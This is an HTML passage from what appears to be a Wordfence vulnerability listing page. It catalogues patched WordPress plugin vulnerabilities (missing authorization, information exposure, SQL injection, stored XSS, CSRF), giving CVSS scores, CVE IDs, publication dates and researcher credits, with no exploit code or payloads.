<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84878b9c-c13c-44d5-a39d-6befd51a14ff" target="_blank" rel="noopener">WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards &lt;= 5.5.80 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66595" target="_blank" rel="noopener noreferrer">							CVE-2026-66595						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-data-access" target="_blank" rel="noopener">WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards</a> <span class="wfvr-software-slug">[wp-data-access]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doc4cash" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0331168be74426433ad360641edcc8e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0331168be74426433ad360641edcc8e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doc4cash" target="_blank" rel="noopener">doc4cash</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84878b9c-c13c-44d5-a39d-6befd51a14ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/499a43c3-d76e-454a-b882-8e0ff7eaf72d" target="_blank" rel="noopener">WP Directory Kit &lt; 1.5.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18231" target="_blank" rel="noopener noreferrer">							CVE-2026-18231						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/499a43c3-d76e-454a-b882-8e0ff7eaf72d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a5a7fa2-856e-47e2-9e32-95d5f50d7b2d" target="_blank" rel="noopener">YayCurrency – WooCommerce Multi-Currency Switcher &lt; 3.3.5 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16058" target="_blank" rel="noopener noreferrer">							CVE-2026-16058						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaycurrency" target="_blank" rel="noopener">YayCurrency – WooCommerce Multi-Currency Switcher</a> <span class="wfvr-software-slug">[yaycurrency]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2a5a7fa2-856e-47e2-9e32-95d5f50d7b2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7007230-f27e-447a-adc4-d835a0a3039b" target="_blank" rel="noopener">InfiniteWP Client &lt;= 1.13.9 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74011" target="_blank" rel="noopener noreferrer">							CVE-2026-74011						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/iwp-client" target="_blank" rel="noopener">InfiniteWP Client</a> <span class="wfvr-software-slug">[iwp-client]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7007230-f27e-447a-adc4-d835a0a3039b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ef89bd0-e1f6-4818-a5e6-857fae7cf231" target="_blank" rel="noopener">WP Directory Kit &lt; 1.5.7 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18653" target="_blank" rel="noopener noreferrer">							CVE-2026-18653						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ef89bd0-e1f6-4818-a5e6-857fae7cf231" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c07098d-8d7c-4a7f-b58c-b0daf2f56e1e" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers &lt;= 2.17.0 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27365" target="_blank" rel="noopener noreferrer">							CVE-2026-27365						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers</a> <span class="wfvr-software-slug">[organize-series]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ppzzaarr" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f85a351fb56ffb26c63e64ed9e6ccd73.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f85a351fb56ffb26c63e64ed9e6ccd73"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ppzzaarr" target="_blank" rel="noopener">PPzzAArr</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c07098d-8d7c-4a7f-b58c-b0daf2f56e1e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8243b65b-8340-404d-90cb-5706fb239dc2" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer &lt; 6.2.3 &#8211; Authenticated (Editor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74992" target="_blank" rel="noopener noreferrer">							CVE-2026-74992						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8243b65b-8340-404d-90cb-5706fb239dc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c8a29088-0c98-4a79-a4bf-025bcf89782b" target="_blank" rel="noopener">Advanced File Manager &lt;= 5.4.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11565" target="_blank" rel="noopener noreferrer">							CVE-2026-11565						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager-advanced" target="_blank" rel="noopener">Advanced File Manager – Ultimate File Manager for WordPress And Document Library Solution</a> <span class="wfvr-software-slug">[file-manager-advanced]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/christian-kold-jensen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bd0a3fd896cc5bd0ffd365e2b928162.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bd0a3fd896cc5bd0ffd365e2b928162"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/christian-kold-jensen" target="_blank" rel="noopener">Christian Kold Jensen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c8a29088-0c98-4a79-a4bf-025bcf89782b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/daac833f-b350-453a-b56a-fe3b1dd2ed3b" target="_blank" rel="noopener">AutomatorWP &lt;= 5.8.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Information Disclosure via automatorwp_campaign_monitor_get_lists AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76074" target="_blank" rel="noopener noreferrer">							CVE-2026-76074						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/automatorwp" target="_blank" rel="noopener">AutomatorWP – Automator plugin for no-code automations, webhooks &amp; custom integrations in WordPress</a> <span class="wfvr-software-slug">[automatorwp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/daac833f-b350-453a-b56a-fe3b1dd2ed3b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0fd8e7b-1985-4265-8e15-5b3988bb0225" target="_blank" rel="noopener">AutomatorWP &lt;= 5.8.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Information Disclosure via automatorwp_convertkit_get_forms AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76057" target="_blank" rel="noopener noreferrer">							CVE-2026-76057						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/automatorwp" target="_blank" rel="noopener">AutomatorWP – Automator plugin for no-code automations, webhooks &amp; custom integrations in WordPress</a> <span class="wfvr-software-slug">[automatorwp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0fd8e7b-1985-4265-8e15-5b3988bb0225" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ce58796-98af-414c-a63e-3cf92ed293bd" target="_blank" rel="noopener">B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form &amp; More &lt;= 5.2.30 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66589" target="_blank" rel="noopener noreferrer">							CVE-2026-66589						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/b2bking-wholesale-for-woocommerce" target="_blank" rel="noopener">B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form &amp; More</a> <span class="wfvr-software-slug">[b2bking-wholesale-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ce58796-98af-414c-a63e-3cf92ed293bd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/850a39f9-749d-4429-ab27-90ce2c0b1316" target="_blank" rel="noopener">Easy Appointments &lt; 4.0.1 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19406" target="_blank" rel="noopener noreferrer">							CVE-2026-19406						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/850a39f9-749d-4429-ab27-90ce2c0b1316" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8d5fa2d-07ee-46ef-bbcf-e7e45a4bbf69" target="_blank" rel="noopener">Easy Elementor Addons – Addons Pack for Elementor Page Builder &lt;= 2.3.7 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28164" target="_blank" rel="noopener noreferrer">							CVE-2026-28164						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-elementor-addons" target="_blank" rel="noopener">Easy Elementor Addons – Addons Pack for Elementor Page Builder</a> <span class="wfvr-software-slug">[easy-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8d5fa2d-07ee-46ef-bbcf-e7e45a4bbf69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/948d3d24-f596-4ef3-936b-d68219826942" target="_blank" rel="noopener">ECS – Ele Custom Skin for Elementor &lt; 4.3.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19613" target="_blank" rel="noopener noreferrer">							CVE-2026-19613						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ele-custom-skin" target="_blank" rel="noopener">ECS – Ele Custom Skin for Elementor</a> <span class="wfvr-software-slug">[ele-custom-skin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
